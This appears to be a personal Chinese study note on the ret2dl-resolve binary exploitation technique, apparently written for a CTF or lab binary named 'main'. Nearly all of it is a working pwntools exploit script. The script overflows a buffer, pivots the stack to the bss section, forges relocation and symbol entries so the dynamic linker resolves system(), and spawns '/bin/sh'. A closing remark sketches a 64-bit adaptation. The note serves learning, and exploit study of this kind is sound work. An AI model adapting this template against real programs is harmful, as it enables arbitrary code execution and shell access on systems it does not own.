ret2dl学习笔记

http://pwn4.fun/2016/11/09/Return-to-dl-resolve/

怎么说 这个东西很十分非常的模板化

32位程序的利用

# 运行之前把所有的中文注释都删掉

from pwn import *

io = process('./main')
elf = ELF('./main')

start = 0x080483F0
pop_pop_pop_ret = 0x08048619
bss = 0x0804A040 + 0x800
pop_ebp_ret = 0x0804861b
leave_ret = 0x08048458

sleep(0.3)
payload = 'A' * 0x6c
payload += p32(0)
payload += p32(elf.plt['read']) + p32(pop_pop_pop_ret)
payload += p32(0) + p32(bss) + p32(100) #往bss读ROP
payload += p32(pop_ebp_ret) + p32(bss) # 栈迁移
payload += p32(leave_ret)
io.sendline(payload)



msg = '/bin/sh'
PLT = 0x08048380
rel_plt = 0x08048330 # objdump -s -j .rel.plt main
index_offset = (bss + 28) - rel_plt
dynsym = 0x080481d8
dynstr = 0x08048278
fake_sym_addr = bss + 36
align = 0x10 - ((fake_sym_addr - dynsym) & 0xf) # reloc结构体大小为0x10 需要对齐
fake_sym_addr += align
index_dynsym = (fake_sym_addr - dynsym) / 0x10
r_info = (index_dynsym << 8) | 0x7
fake_rel = p32(elf.got['write']) + p32(r_info)
st_name = (fake_sym_addr + 0x10) - dynstr
#st_name = 0x4c
fake_sym = p32(st_name) + p32(0) + p32(0) + p32(0x12)

payload = p32(0) # 紧接着上面都 leave 里面都 pop ebp
#payload += p32(elf.plt['write']) + p32(0)
payload += p32(PLT) + p32(index_offset) + p32(0) # 调用PLT里面解析reloc
#payload += p32(1) + p32(bss + 80) + p32(len(msg))
payload += p32(bss + 80) + p32(0) + p32(0)
payload += fake_rel
payload += 'A' * align
payload += fake_sym
payload += 'system\x00'
payload += 'A' * (80 - len(payload))
payload += msg + '\x00'
payload += 'A' * (100 - len(payload))
io.sendline(payload)
io.interactive()

64位的调整一下，read和write的传参使用init_csu就可以了 应该。。。